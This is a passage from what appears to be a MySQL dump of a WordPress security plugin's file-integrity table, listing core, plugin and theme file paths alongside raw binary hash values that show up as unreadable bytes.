�����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('C���1�o���qD$','wp-content/themes/magazine-hoot/include/admin/images/premium-blogstyles.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�ȋ��\'S/�h� %�','bZ{�(fޫ$�i�K|6���Y�OW�,x�','',0,'?'),('C܎.����xDV�>��','wp-content/themes/magazine-hoot/hybrid/inc/functions-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�D[H��A�eV�',',�1�wU�P�U�u��b0���/\Z��\ZOG=!z�','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bR��\'~��f�_D�','\Z�G�X\'~S�_AF��)t�iw�k�PELX6','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('D=n�vbP��._��','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UWn:s�zk]U`��','@�%H2Z6#���y�����U4I�-��','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('D`��q&2��','wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]H�9\0�$a�','c����f�����}�u���h���&����','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�C����E[=���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z#/@�(C�`Њ�X��','�/k�#�R_���ElK�ʀ`J�T�*]X��|','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�S�S�_�Y�_3�f','ib��������itYz�Q.��F0��O^','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1܎ͺ2��{�','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;񐼽{��gul��r�p','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('EJ�TW����D�)����','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f�qX�����','kO[0�Xn@�ȇr02]��-����\n,���8','',0,'?'),('EQ&�Gf�N�槎)��','wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�6o���WE�I���','��IK�i$�a�Ϋx��꽺5��H�:�8��','',0,'?'),('EY_5��������V','wp-content/themes/magazine-hoot/hybrid/changelog.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�4��A�7-,�� XO','�\\�h�����U7�,M̴O�[���]\n4��S','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6���֌�臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl�Y}���q�\r���7$','��w�?�Z�L\0�ì*8��L_���5��`��','',0,'?'),('E��2ҍ���0ۉK','wp-content/themes/magazine-hoot/include/admin/images/3-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��\r�s�6����','�jf(<�\r�6����d�>�~����]�����\n','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>��	��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa 	%�Q�U�SJX;M.G�j','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n�	:�›{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F}3�(�̬�OI ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j;�ʻ��#��qb','m7w�W���&em�C������1��a�c	=27','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','삺�m��\n\'��P�','^���;(�R�@ݪ:��:_9���*j���','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�ÂҶ�A-��>c�`','�E�\n�F	�	���M���%{��a���`,�','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��s�p���p1��','Uuu�	jK��>}��ʊ$|@.8K3����','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('Gq�b٫	������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��C��̚{\"Hp�=','��R�����l��	�n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A˼ܗ\ri^o4~�','��Q9sY��&a��*�}J�x�1��u����','',0,'?'),('G�J��$�+�����','wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/license.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g1��\'\'�\ZI�]j(*','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp	�0Ox�1{t<�','',0,'?'),('G�?�yİ���~r&','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���#�Rw�ij\n��','&T�)\'4:���\"v�t*���\n�����J\ZR�','',0,'?'),('H�\0 �� N�HB]I','wp-content/themes/twentytwentyone/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�8�{N����W�L','�>��Q�#*������^�_(VY&I�@‰H�҇[�','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�n���VJ�R�x�5��','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{&��Þ���>��','�i$�z:1$s+»����̔��\Z��!o��','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�E�{�F�\n���','qC�&�+�N<[�l\\{V�h�R�)��Ž2�','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('Hmϡ\n��\0M�}0\"ؒ�','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�L�AZ;ߪ��u','�� ��w�M���ӳY�\r�%��%�\'�aO�A&�x','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('H�͛�&����;�fY7','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�4/[\"\r���R�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Po��3���~��Q','����k��_�?�E�%�Gޓi��BEOyQ��','',0,'?'),('H��_�\Z��*�V��~�','wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-right-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DFhg�O;8�$','f�W�o�k8-�N�`�W~$:�ᬊ�2�I�2[�','',0,'?'),('H��!��[?�z>����','wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅�:K���7&Z9Hc','�*�F��:��Å=IH\'x��\\\"��\'��:','',0,'?'),('H�0Zk�z|� �\r�+','wp-includes/pomo/pomo/plural-forms.php',0,'s_7�;�	]�Lvlɟ','s_7�;�	]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=؜1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('IS���ڝ��WԖ�}','wp-content/themes/magazine-hoot/hybrid/extend/extend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#\n1V< ��$�;','�]�k/�1����Ǡ�m�n�̸�׃����Q','',0,'?'),('Ic���r��������','wp-content/themes/magazine-hoot/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����pV�:���q��y','d狿ג1a�@��>P=_�n����0��6�&�9','',0,'?'),('Ix����� �o�\\U','wp-content/themes/magazine-hoot/hybrid/admin/class-term-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','khBa����r�۴�','�Y�\'��EF#�CX�n�O���o��ۄ����','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ���G��\'W���','���ij��x�\0ךM5+�i���@èQj8�v\"','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('J�v�P8g�}ls��y','wp-content/themes/magazine-hoot/hybrid/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r����*Hss���[','Ԏ͞��Zf�!-��>�XAR2\'���Y����','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K�hC�\0]P���O2%','wp-content/themes/magazine-hoot/template-parts/menu-primary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<\\6ߡ[��z�}�','�RA��^=fC�J(�<�iOw���#l�Jy','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���<���ȝ���a','ߌ녔B��J+�f�,q*�WC\"^_�V\0.s�@�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	